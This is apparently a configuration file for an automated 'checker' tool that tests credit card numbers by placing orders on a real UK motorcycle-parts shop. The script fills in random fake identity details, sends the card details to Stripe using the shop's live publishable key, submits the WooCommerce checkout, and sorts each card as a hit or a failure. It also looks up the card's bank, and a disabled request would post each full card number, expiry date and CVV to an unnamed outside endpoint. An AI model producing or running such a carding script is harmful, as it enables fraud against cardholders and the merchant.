[SETTINGS]
{
  "Name": "sportaxstripe",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2025-12-20T16:35:24.5108868+05:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "otaku",
  "Version": "1.1.1 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "sportaxstripe",
  "IconPath": "Icon\\svbfile.ico",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
!FUNCTION Substring "12" "4" "<cc>" -> VAR "accnumber" 

FUNCTION RandomString "?l?l?l?l?l?l?l?l@?l?l?l?l.?l?l?l?l" -> VAR "email" 

!FUNCTION RandomString "?l?l?l?l?l?l?l?l?d?d?d?d?d" -> VAR "username" 

FUNCTION RandomString "?l?l?l?l?l?l?l?l" -> VAR "first_name" 

FUNCTION RandomString "?l?l?l?l?l?l?l?l" -> VAR "last_name" 

FUNCTION RandomString "street+?d?d?d" -> VAR "address" 

!FUNCTION RandomString "?l?l?l?l?l?l?l?l" -> VAR "city" 

FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d" -> VAR "phone" 

FUNCTION GetRandomUA BROWSER Chrome -> VAR "uagen" 

FUNCTION RandomString "90?d?d?d" -> VAR "zipcode" 

!FUNCTION GenerateGUID -> VAR "guid" 

!FUNCTION GenerateGUID -> VAR "muid" 

!FUNCTION GenerateGUID -> VAR "sid" 

REQUEST POST "https://sportaxracing.co.uk/shop/clutch-cover/e-start-gear-cover-screw-set/" Multipart 
  
  STRINGCONTENT "quantity: 1" 
  STRINGCONTENT "add-to-cart: 3695" 
  BOUNDARY "------WebKitFormBoundaryK2YXfAMxQTgZpemQ" 
  HEADER "User-Agent: <uagen>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://sportaxracing.co.uk/checkout/" 
  
  HEADER "User-Agent: <uagen>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "woocommerce-process-checkout-nonce\" value=\"" "\" />" -> VAR "pay_nonce" 

REQUEST POST "https://api.stripe.com/v1/sources" 
  CONTENT "referrer=https%3A%2F%2Fsportaxracing.co.uk&type=card&owner[name]=<first_name>+<last_name>&owner[address][line1]=<address>&owner[address][city]=beverly&owner[address][postal_code]=hg1+1aa&owner[address][country]=GB&owner[email]=<email>&owner[phone]=<phone>&card[number]=<cc>&card[cvc]=<cvv>&card[exp_month]=<mes>&card[exp_year]=<ano>&guid=NA&muid=NA&sid=NA&pasted_fields=number&payment_user_agent=stripe.js%2Fbe0b733d77%3B+stripe-js-v3%2Fbe0b733d77%3B+card-element&time_on_page=69115&client_attribution_metadata[merchant_integration_source]=elements&client_attribution_metadata[merchant_integration_subtype]=card&client_attribution_metadata[merchant_integration_version]=2017&key=pk_live_mlOwgQvhxcwj7kkNivSHZ5iy" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: <uagen>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" JSON "id" -> VAR "id" 

REQUEST POST "https://sportaxracing.co.uk/?wc-ajax=checkout" 
  CONTENT "billing_first_name=<first_name>&billing_last_name=<last_name>&billing_company=&billing_country=GB&billing_address_1=<address>&billing_address_2=&billing_city=beverly&billing_state=&billing_postcode=hg1+1aa&billing_phone=<phone>&billing_email=<email>&account_password=&shipping_first_name=&shipping_last_name=&shipping_company=&shipping_country=GB&shipping_address_1=&shipping_address_2=&shipping_city=&shipping_state=&shipping_postcode=&order_comments=&shipping_method%5B0%5D=legacy_flat_rate&payment_method=stripe&terms=on&terms-field=1&woocommerce-process-checkout-nonce=<pay_nonce>&_wp_http_referer=%2F%3Fwc-ajax%3Dupdate_order_review&stripe_source=<id>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "messages\":\"<ul class=\\\"woocommerce-error\\\" role=\\\"alert\\\">\\n\\t\\t\\t<li>\\n\\t\\t\\t" "\\t\\t<\\/li>\\n\\t<\\/ul>" CreateEmpty=FALSE -> CAP "msg" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"result\":\"success\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"result\":\"failure\"" 
    KEY "wc_stripe_verify_intent" 

PARSE "<SOURCE>" JSON "result" CreateEmpty=FALSE -> CAP "result" 

PARSE "<SOURCE>" LR "\"order_id\":" "}" CreateEmpty=FALSE -> CAP "order_id" 

FUNCTION Substring "0" "6" "<cc>" -> VAR "bin" 

REQUEST GET "https://lookup.binlist.net/<bin>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#bank PARSE "<SOURCE>" LR "\"bank\":{\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "bank" 

#emoji PARSE "<SOURCE>" JSON "emoji" CreateEmpty=FALSE -> CAP "emoji" 

#count PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "count" 

#brand PARSE "<SOURCE>" JSON "scheme" CreateEmpty=FALSE -> CAP "brand" 

!REQUEST POST "" 
!  CONTENT "&text=𝗖𝗖 ⇾ <cc>|<mes>|<ano>|<cvv>\\n𝗚𝗮𝘁𝗲𝙬𝙖𝙮 ⇾ Stripe Auth\\n𝗥𝗲𝙨𝙥𝙤𝙣𝙨𝗲 ⇾ <msg>\\nStatus ⇾ <status>\\nBin ⇾<bin>\\nBank ⇾<bank>\\nCountry ⇾<count><emoji>\\nBrand ⇾<brand>" 
!  CONTENTTYPE "application/x-www-form-urlencoded" 
!  HEADER "User-Agent: <uagen>" 
!  HEADER "Pragma: no-cache" 
!  HEADER "Accept: */*" 

